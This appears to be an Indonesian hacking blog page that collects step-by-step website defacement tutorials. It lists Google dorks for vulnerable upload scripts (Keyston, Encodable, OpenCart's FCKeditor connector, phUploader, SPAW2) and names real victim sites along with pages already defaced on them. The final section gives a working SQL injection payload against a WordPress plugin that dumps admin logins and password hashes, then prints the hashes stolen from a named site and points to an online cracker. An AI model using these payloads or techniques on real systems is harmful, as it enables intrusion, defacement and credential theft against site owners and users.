deface keyston web upload

[DEFACE] Keyston Web Upload 

Asslkm.. Thread lg nih :D
Setlh lama vakum n index phl kena pepes 
Ya sdh.. mari simak ni thread :D
Bolh dpt dr forum sebelh 

Code: (Select All)

Dork: [intitle:"Keyston Web Upload" inurl:"/cgi-bin/"] '0r' [intext:"by PA Visitors Network"]
POC: http://[localhost]/cgi-bin/upload.cgi
Preview:
- http://[localhost]/list/[yourshell]
- http://[localhost]/list/images/[yourshell]

Hasil: http://shoreforestcampground.com/list/index.html

Maaf Thread agk kacau hhe:madesu::madesu:

Sekian dlu... smga brmnfaat :D
Wassalam :D

sumber : palembanghackerlink.com

Read More

upload file with Encodable

ALJINET - LANGSUNG SAJA!!! upload file dengan Encodable

dork:‎"intext:File Upload by Encodable"

example:http://encodable.com/
uploaddemo/

you can see the upload file :Dhasil: http://encodable.com/
uploaddemo/files/redme.html

contoh hasil dari blogger aljinet yang sudah di praktekan
klik aja.

contoh target yang lain silakan di coba saja.........
http://www.bellblue.com/cgi-bin/filechucker.cgi
http://www.freshdls.net/upload/
http://www.pictureitoncanvas.com/upload/index.php
http://www.fitchgroup.com/upload/
http://highschooldropbox.unl.edu/upload/

Read More

deface Powered By OpenCart site:com

ALJINET BUMIAYU - LANGSUNG AJA!!!

dork :Powered By OpenCart site:com ( untuk site: bisa di ganti dengan my , il .gov dll. yang penting supportdi opencart :D) kalo pengin semuanya pake ini aja Powered By OpenCart,copy paste kan aja di search google.

contoh target : site- http://www.xuhongmrw.com/

bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nyaex: http://www.target.com/patch/

nah kalo dh dpt trget, lngsung aj kita inject exploitnya

for exploit :
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

for exploit :
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

jadi nya gini bro :
ex: http://www.superbikecarbonparts.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

kalau target yang ada /patch/ , inject nya di belakang patch nya
ex: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Jika berhasil akan keluar semacam peringatan seperti ini : 
"file uploaded with no errors"
kita tinggal cek aja di 
"Get Folders and Files" apakah sudah terupload apa belum :D
untuk mengceknya kita tinggal ketik aja nama file deface kita misal punya saja aljinet.html
tinggal ketik aja di belakang target tadi,jadi seperti ini
http://www.superbikecarbonparts.com/aljinet.html.
oya hampir saja lupa ganti Connector:ASP jadi PHP ya kawan.
contoh hasil :
http://www.superbikecarbonparts.com/aljinet.html

Read More

deface website with dork poweres by phuploder

deface website dengan dork poweres by phuploder
ALJINET BUMIAYU
ini untuk belajar deface website kecil-kecilan :D
karena banyak bug di google,saya akan kasih satu bug yang ada di perambahan google
salah satunya dengan dork,yaitu mendeface dengan metode dork untuk mencari targetnya.

pertama kita siapkan dorknya
intitle:powered by phuploader

pilihlah targetnya dengan dork yang udah gue kasih tadi di atas
cari dengan kata kunci intitle: Powered By phUploader, phuploder , powered by phuploder
atau lu bisa kembangin itu dork,,semangat :D
contoh target nih,gue kasih :D
jpg, gif, png, zip, txt, doc, pdf, pub, docx, csv, ppt.


kemudia lu siapkan shell deface lu,di dork ini lu gak bisa
upload file .html atau yang lainnya,kecuali lu bisa deface semuanya :D
udah terlihat dork ini hanya untuk upload :D
ya,kite siapkan aja filenya beruba jpg, gif, png, zip, txt, doc, pdf, pub, docx, csv, ppt.
karena supportnya cuma itu,,oke langsung aja ya

Misal lu upload filenya dengan .txt
nanti hasilnya jadi seperti ini poc nya
http//target.com/uploads/file_name.txt
ini contoh hasilnya : http://www.humortshirtzone.com/uploads/1351952458.jpg

segitu saja turtorial cupu dari gue,karena gue juga baru belajar :D
deface site yang mudah-mudah hehehe..................
oya jangan lupa di coment kawan artikel aljinet ini gue tunggu :)


copyright by : aljinet bumiayu

NOte : copas boleh asal sertakan sumber dari aslinya berupa link dari aljinet bumiayu
hargai dan hormati kami,kami pun akan lebih menghormati dan menghargai usaha kalian....

Read More

deface-metode-spaw-upload-web

ALJINET BUMIAYU - hujan-hujan gini enak nya ngapain gan ???gini aja,ane ada sedikit turtorial deface website dengan metode/cara copas2an aja yah :D untuk yang newbi hehehe,mari belajar ^_^ saya juga belum ahli sekali dan perlu banyak belajar.sudah banyak sih yang udah tau deface macam ini,tapi tak apalah ini hanya buat refrensi saya saja dan untuk pembelajaran tentunya,hehehe

berikut turtorial nya

cari target dengan
dork :  inurl:”spaw2/dialogs/” OR  inurl:”spaw2/uploads/files/” 
cari di google ya gan cari dan cari targetnya eh misal saya dapat target kek ginihttp://climatechange.jgsee.org/Admin/spaw2/uploads/files/CC%20Book/ชุดความรู้%20CC%20Vol2.pdf<<liat>> nah terus tulisan

pada bagian ini :spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf
silakan ganti dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

untuk hasilnya jadi seperti ini gan liat di bawahhttp://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

-biasanya kalo sudah tahap seperti ini ada di bawah ke halaman file manager 
-masukan hasil desain script deface anda ke upload file manager tersebut,liat dulu extitasi yang buat upload itu apa!!apa pake php,html atau mungkin txt. hehehe
-kalo anda/agan sukses melakukan uploader maka,akan di kasih download an file yang anda di file manager  tersebut.

dan ini sedikit belajar saya gan :


http://degezondheidskrant.nl/admin/spaw2/uploads/files/B4cK!!nG.html
http://climatechange.jgsee.org/Admin/spaw2/uploads/files/TORO.HTML

Read More

deface exploit wordpress

BUMIAYU,ALJINET-Pagi semua,kali ini aljinet mau berbagi dengan sahabat bumiayu,tentang dan cara deface website,atau mencari kelemahan dari wordpress.
Dengan metode menggunakan exploit untuk mencari target yang mengalamai kelemahan sistem(vuln).coba kita mulai testing :D
yang harus di gunakan adalah dork,sahabat bumiayu sudah tak anggap sudah tau dork,berikut dork-nya

Dork :inurl:"wp-content/plugins/photoracer/viewimg.php?id=" .
(copas ke url google,nah dapat tuh banyak vuln wordpressnya) :D

Untuk mencari password dan adminya,kalian gunakan exploit,nah ini yang saya bahasa exploit
berikut exploitnya : ada 2 cara sebagai berikut

exploit :
1. +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
2. +union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9+from+wp_users

Silakan sahabat bumiayu pilih yang mana,aljinet hanya share :D gunakan dengan bijak.Itu kalian bisa pilih nomor.1 dan 2 ,tapi jangan di semuanya ya ckckck
kalo sudah di exploitkan,nah lo ketemu tuh admin sama passnya :D
 

contoh/demo
http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1 (vuln)
injek aja dengan menggunakan exploit yang aljinet sudah share kan,misala pake yang nomor 1.
jadi begini,jadinya

http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat%280x3a,user_login,0x3a,user_pass%29,6,7,8+from+wp_users--

keluar tuh,ada adminya
:admin:$P$B5OZifKi4NHils1VNfO8CspmAwZqvP0,:guess:$P$B30pt3MIHR6y8ZeEPeS5kPImOXAeyz/,:emilia_editor:$P$B4l5wGl73xike0iL8rdpU3EQwsCIDG.,:jeni_chiriac:$P$BxJJ3YUfSZNyP9zpSkMLJal40BBVHY/

untuk mencracknya bisa secara online
http://www.md5decrypt.org/ (dimd5 decryp online )

lumayanlah kalo ada $$ bagi-bagi ya hihihihi

mangap turtorialnya berantakan,sementara segini saja ya sobat bumiayu hacker,aljinet.untuk selanjutnya nanti akan share toolsnya :D

keep silit
BY.aljinet bumiayu

Read More